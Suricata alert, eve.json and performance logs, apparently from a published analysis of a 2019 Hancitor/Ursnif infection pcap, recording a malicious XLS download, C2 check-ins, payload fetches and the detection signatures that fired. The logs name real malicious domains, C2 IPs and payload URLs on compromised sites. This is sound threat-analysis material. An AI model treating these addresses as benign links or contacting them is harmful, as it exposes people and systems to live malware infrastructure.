flow_mgr.rows_skipped                      | Total                     | 65520
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7079200


eve.json - (619412 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
{"timestamp":"2019-01-16T17:47:20.705053+0000","flow_id":1935215327494685,"pcap_cnt":1,"event_type":"dns","src_ip":"10.1.16.101","src_port":63962,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15403,"rrname":"auctionhauz.ca","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:47:20.959995+0000","flow_id":1935215327494685,"pcap_cnt":2,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":63962,"proto":"UDP","dns":{"type":"answer","id":15403,"rcode":"NOERROR","rrname":"auctionhauz.ca","rrtype":"A","ttl":599,"rdata":"47.74.2.183"}}
{"timestamp":"2019-01-16T17:47:23.843622+0000","flow_id":2003513897429348,"pcap_cnt":41,"event_type":"alert","src_ip":"47.74.2.183","src_port":80,"dest_ip":"10.1.16.101","dest_port":49166,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019837,"rev":3,"signature":"ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2019-01-16T17:47:25.868768+0000","flow_id":2003513897429348,"pcap_cnt":60,"event_type":"alert","src_ip":"47.74.2.183","src_port":80,"dest_ip":"10.1.16.101","dest_port":49166,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2810419,"rev":1,"signature":"ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2019-01-16T17:47:27.049994+0000","flow_id":2003513897429348,"pcap_cnt":67,"event_type":"alert","src_ip":"47.74.2.183","src_port":80,"dest_ip":"10.1.16.101","dest_port":49166,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2810419,"rev":1,"signature":"ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2019-01-16T17:47:42.798125+0000","flow_id":2003513897429348,"pcap_cnt":320,"event_type":"http","src_ip":"10.1.16.101","src_port":49166,"dest_ip":"47.74.2.183","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"auctionhauz.ca","url":"\/?82a1=SQTDEG3ImPlUFQiOQJZRIKG3CQi","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword"}}
{"timestamp":"2019-01-16T17:47:42.798371+0000","flow_id":2003513897429348,"pcap_cnt":322,"event_type":"fileinfo","src_ip":"47.74.2.183","src_port":80,"dest_ip":"10.1.16.101","dest_port":49166,"proto":"TCP","http":{"hostname":"auctionhauz.ca","url":"\/?82a1=SQTDEG3ImPlUFQiOQJZRIKG3CQi","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":274432},"app_proto":"http","fileinfo":{"filename":"invoice_925108.xls","gaps":false,"state":"CLOSED","stored":false,"size":274432,"tx_id":0}}
{"timestamp":"2019-01-16T17:49:48.480119+0000","flow_id":462252008035191,"pcap_cnt":323,"event_type":"dns","src_ip":"10.1.16.101","src_port":59342,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":10347,"rrname":"api.ipify.org","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"api.ipify.org","rrtype":"CNAME","ttl":2596,"rdata":"nagano-19599.herokussl.com"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"nagano-19599.herokussl.com","rrtype":"CNAME","ttl":2492,"rdata":"elb097307-934924932.us-east-1.elb.amazonaws.com"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":9,"rdata":"107.22.215.20"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":9,"rdata":"50.16.248.221"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":9,"rdata":"23.21.121.219"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":9,"rdata":"50.19.247.198"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":9,"rdata":"54.204.36.156"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":9,"rdata":"54.243.123.39"}}
{"timestamp":"2019-01-16T17:49:48.786023+0000","flow_id":2119922553217716,"pcap_cnt":331,"event_type":"alert","src_ip":"10.1.16.101","src_port":49170,"dest_ip":"107.22.215.20","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021997,"rev":3,"signature":"ET POLICY External IP Lookup api.ipify.org","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2019-01-16T17:49:48.786023+0000","flow_id":2119922553217716,"pcap_cnt":331,"event_type":"http","src_ip":"10.1.16.101","src_port":49170,"dest_ip":"107.22.215.20","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"api.ipify.org","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/plain"}}
{"timestamp":"2019-01-16T17:49:48.792836+0000","flow_id":586294958496004,"pcap_cnt":332,"event_type":"dns","src_ip":"10.1.16.101","src_port":59977,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43279,"rrname":"ledbabdintot.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:49:48.875661+0000","flow_id":586294958496004,"pcap_cnt":333,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59977,"proto":"UDP","dns":{"type":"answer","id":43279,"rcode":"NOERROR","rrname":"ledbabdintot.com","rrtype":"A","ttl":589,"rdata":"77.72.134.167"}}
{"timestamp":"2019-01-16T17:49:49.440972+0000","flow_id":547318685807,"pcap_cnt":341,"event_type":"alert","src_ip":"10.1.16.101","src_port":49171,"dest_ip":"77.72.134.167","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2819978,"rev":5,"signature":"ETPRO TROJAN Tordal\/Hancitor\/Chanitor Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2019-01-16T17:49:49.440972+0000","flow_id":547318685807,"pcap_cnt":341,"event_type":"fileinfo","src_ip":"10.1.16.101","src_port":49171,"dest_ip":"77.72.134.167","dest_port":80,"proto":"TCP","http":{"hostname":"ledbabdintot.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1095},"app_proto":"http","fileinfo":{"filename":"\/4\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":119,"tx_id":0}}
{"timestamp":"2019-01-16T17:49:49.441089+0000","flow_id":547318685807,"pcap_cnt":342,"event_type":"http","src_ip":"10.1.16.101","src_port":49171,"dest_ip":"77.72.134.167","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"ledbabdintot.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:49.442526+0000","flow_id":1161764741693598,"pcap_cnt":343,"event_type":"dns","src_ip":"10.1.16.101","src_port":51527,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18488,"rrname":"jenrobin.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:49:49.531285+0000","flow_id":1161764741693598,"pcap_cnt":344,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":51527,"proto":"UDP","dns":{"type":"answer","id":18488,"rcode":"NOERROR","rrname":"jenrobin.com","rrtype":"A","ttl":4922,"rdata":"192.254.225.163"}}
{"timestamp":"2019-01-16T17:49:49.717401+0000","flow_id":973612961832745,"pcap_cnt":351,"event_type":"http","src_ip":"10.1.16.101","src_port":49172,"dest_ip":"192.254.225.163","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"jenrobin.com","url":"\/wp-content\/plugins\/mailchimp-for-wp\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:49.720773+0000","flow_id":973612961832745,"pcap_cnt":353,"event_type":"fileinfo","src_ip":"192.254.225.163","src_port":80,"dest_ip":"10.1.16.101","dest_port":49172,"proto":"TCP","http":{"hostname":"jenrobin.com","url":"\/wp-content\/plugins\/mailchimp-for-wp\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/jenrobin.com\/cgi-sys\/suspendedpage.cgi","length":291},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/mailchimp-for-wp\/1","gaps":false,"state":"CLOSED","stored":false,"size":291,"tx_id":0}}
{"timestamp":"2019-01-16T17:49:49.973808+0000","flow_id":973612961832745,"pcap_cnt":357,"event_type":"http","src_ip":"10.1.16.101","src_port":49172,"dest_ip":"192.254.225.163","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"jenrobin.com","url":"\/cgi-sys\/suspendedpage.cgi","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:50.010874+0000","flow_id":1109870799366778,"pcap_cnt":358,"event_type":"dns","src_ip":"10.1.16.101","src_port":52955,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64266,"rrname":"kevinalves.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:49:50.094948+0000","flow_id":1109870799366778,"pcap_cnt":359,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":52955,"proto":"UDP","dns":{"type":"answer","id":64266,"rcode":"NOERROR","rrname":"kevinalves.com","rrtype":"A","ttl":12570,"rdata":"192.232.218.126"}}
{"timestamp":"2019-01-16T17:49:50.250833+0000","flow_id":875251768391262,"pcap_cnt":366,"event_type":"http","src_ip":"10.1.16.101","src_port":49173,"dest_ip":"192.232.218.126","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"kevinalves.com","url":"\/wp-content\/plugins\/w3-total-cache\/inc\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:50.251364+0000","flow_id":875251768391262,"pcap_cnt":368,"event_type":"fileinfo","src_ip":"192.232.218.126","src_port":80,"dest_ip":"10.1.16.101","dest_port":49173,"proto":"TCP","http":{"hostname":"kevinalves.com","url":"\/wp-content\/plugins\/w3-total-cache\/inc\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/kevinalves.com\/cgi-sys\/suspendedpage.cgi","length":295},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/w3-total-cache\/inc\/1","gaps":false,"state":"CLOSED","stored":false,"size":295,"tx_id":0}}
{"timestamp":"2019-01-16T17:49:50.477298+0000","flow_id":875251768391262,"pcap_cnt":370,"event_type":"http","src_ip":"10.1.16.101","src_port":49173,"dest_ip":"192.232.218.126","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"kevinalves.com","url":"\/cgi-sys\/suspendedpage.cgi","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:50.478413+0000","flow_id":2158688928156877,"pcap_cnt":371,"event_type":"dns","src_ip":"10.1.16.101","src_port":53392,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43956,"rrname":"emilyhendrie.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:49:50.565893+0000","flow_id":2158688928156877,"pcap_cnt":372,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":53392,"proto":"UDP","dns":{"type":"answer","id":43956,"rcode":"NOERROR","rrname":"emilyhendrie.com","rrtype":"A","ttl":11672,"rdata":"192.254.234.16"}}
{"timestamp":"2019-01-16T17:49:50.745472+0000","flow_id":1298958882088552,"pcap_cnt":379,"event_type":"http","src_ip":"10.1.16.101","src_port":49174,"dest_ip":"192.254.234.16","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"emilyhendrie.com","url":"\/wp-content\/plugins\/jetpack\/modules\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:50.746157+0000","flow_id":1298958882088552,"pcap_cnt":381,"event_type":"fileinfo","src_ip":"192.254.234.16","src_port":80,"dest_ip":"10.1.16.101","dest_port":49174,"proto":"TCP","http":{"hostname":"emilyhendrie.com","url":"\/wp-content\/plugins\/jetpack\/modules\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/emilyhendrie.com\/cgi-sys\/suspendedpage.cgi","length":299},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/jetpack\/modules\/1","gaps":false,"state":"CLOSED","stored":false,"size":299,"tx_id":0}}
{"timestamp":"2019-01-16T17:49:50.935913+0000","flow_id":1298958882088552,"pcap_cnt":383,"event_type":"http","src_ip":"10.1.16.101","src_port":49174,"dest_ip":"192.254.234.16","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"emilyhendrie.com","url":"\/cgi-sys\/suspendedpage.cgi","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:50.937315+0000","flow_id":2103406256606563,"pcap_cnt":384,"event_type":"dns","src_ip":"10.1.16.101","src_port":49810,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29931,"rrname":"salshakenwrap.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:49:51.018744+0000","flow_id":2103406256606563,"pcap_cnt":385,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":49810,"proto":"UDP","dns":{"type":"answer","id":29931,"rcode":"NOERROR","rrname":"salshakenwrap.com","rrtype":"A","ttl":14394,"rdata":"50.87.146.83"}}
{"timestamp":"2019-01-16T17:49:51.355657+0000","flow_id":669531424903294,"pcap_cnt":428,"event_type":"alert","src_ip":"50.87.146.83","src_port":80,"dest_ip":"10.1.16.101","dest_port":49175,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2824549,"rev":2,"signature":"ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17

This file has been truncated. Go here to download in full.


suricata-4.0.0-etpro-all-alert-2019-01-31-T-11-12-00-01312019.1111-2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap.txt - (7990 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
01/16/2019-17:47:23.843622  [**] [1:2019837:3] ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 47.74.2.183:80 -> 10.1.16.101:49166
01/16/2019-17:47:25.868768  [**] [1:2810419:1] ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 47.74.2.183:80 -> 10.1.16.101:49166
01/16/2019-17:47:27.049994  [**] [1:2810419:1] ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 47.74.2.183:80 -> 10.1.16.101:49166
01/16/2019-17:49:48.786023  [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.1.16.101:49170 -> 107.22.215.20:80
01/16/2019-17:49:49.440972  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49171 -> 77.72.134.167:80
01/16/2019-17:49:51.355657  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 50.87.146.83:80 -> 10.1.16.101:49175
01/16/2019-17:49:57.837861  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49176 -> 77.72.134.167:80
01/16/2019-17:49:59.792429  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 50.87.146.83:80 -> 10.1.16.101:49175
01/16/2019-17:50:00.117639  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49177 -> 77.72.134.167:80
01/16/2019-17:50:00.969946  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 50.87.146.83:80 -> 10.1.16.101:49175
01/16/2019-17:51:19.743422  [**] [1:2017645:3] ET CURRENT_EVENTS DNS Query Domain .bit [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.16.101:64513 -> 192.71.245.208:53
01/16/2019-17:52:01.622762  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49186 -> 77.72.134.167:80
01/16/2019-17:54:02.381523  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49189 -> 77.72.134.167:80
01/16/2019-17:56:03.126264  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49196 -> 77.72.134.167:80
01/16/2019-17:58:03.854889  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49207 -> 77.72.134.167:80
01/16/2019-18:00:04.692897  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49216 -> 77.72.134.167:80
01/16/2019-18:01:16.929928  [**] [1:2017645:3] ET CURRENT_EVENTS DNS Query Domain .bit [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.16.101:63458 -> 192.71.245.208:53
01/16/2019-18:02:05.336719  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49227 -> 77.72.134.167:80
01/16/2019-18:04:05.886226  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49230 -> 77.72.134.167:80
01/16/2019-18:06:06.445482  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49239 -> 77.72.134.167:80
01/16/2019-18:08:07.134485  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49248 -> 77.72.134.167:80
01/16/2019-18:10:07.759147  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49257 -> 77.72.134.167:80
01/16/2019-18:11:16.599373  [**] [1:2017645:3] ET CURRENT_EVENTS DNS Query Domain .bit [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.16.101:63886 -> 192.71.245.208:53
01/16/2019-18:12:08.313488  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49268 -> 77.72.134.167:80
01/16/2019-18:14:08.861489  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49271 -> 77.72.134.167:80
01/16/2019-18:16:09.420495  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49280 -> 77.72.134.167:80
01/16/2019-18:18:09.986155  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49289 -> 77.72.134.167:80
01/16/2019-18:20:10.546540  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49298 -> 77.72.134.167:80
01/16/2019-18:21:14.395229  [**] [1:2017645:3] ET CURRENT_EVENTS DNS Query Domain .bit [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.16.101:61524 -> 192.71.245.208:53
01/16/2019-18:22:11.247360  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49309 -> 77.72.134.167:80
01/16/2019-18:24:11.948546  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49312 -> 77.72.134.167:80
01/16/2019-18:26:12.718625  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49323 -> 77.72.134.167:80
01/16/2019-18:28:13.556355  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49332 -> 77.72.134.167:80
01/16/2019-18:30:14.116876  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49341 -> 77.72.134.167:80
01/16/2019-18:30:51.858712  [**] [1:2017645:3] ET CURRENT_EVENTS DNS Query Domain .bit [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.16.101:49861 -> 192.71.245.208:53
01/16/2019-18:32:14.670843  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49352 -> 77.72.134.167:80
01/16/2019-18:34:15.226306  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49355 -> 77.72.134.167:80
01/16/2019-18:36:15.780792  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49366 -> 77.72.134.167:80
01/16/2019-18:38:16.517517  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49375 -> 77.72.134.167:80


suricata-4.0.0-etpro-all-perf.txt-2019-01-31-T-11-12-00-01312019.1111-2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap.txt - (66774 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 1/31/2019 -- 11:12:00. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2820158      1        2        20418406     4.55   22       0        17074734    928109.36   0.00        928109.36  
  2        2022547      1        1        2924722      0.65   65       0        2740314     44995.72    0.00        44995.72   
  3        2816328      1        5        2474641      0.55   55       0        898636      44993.47    0.00        44993.47   
  4        2811745      1        4        20139974     4.48   69       0        702172      291883.68   0.00        291883.68  
  5        2815263      1        3        651075       0.14   2        0        510008      325537.50   0.00        325537.50  
  6        2816510      1        3        7510786      1.67   43       0        506329      174669.44   0.00        174669.44  
  7        2820157      1        2        3690087      0.82   22       0        484527      167731.23   0.00        167731.23  
  8        2021774      1        2        832948       0.19   6        0        457639      138824.67   0.00        138824.67  
  9        2802987      1        5        1245904      0.28   14       0        446975      88993.14    0.00        88993.14   
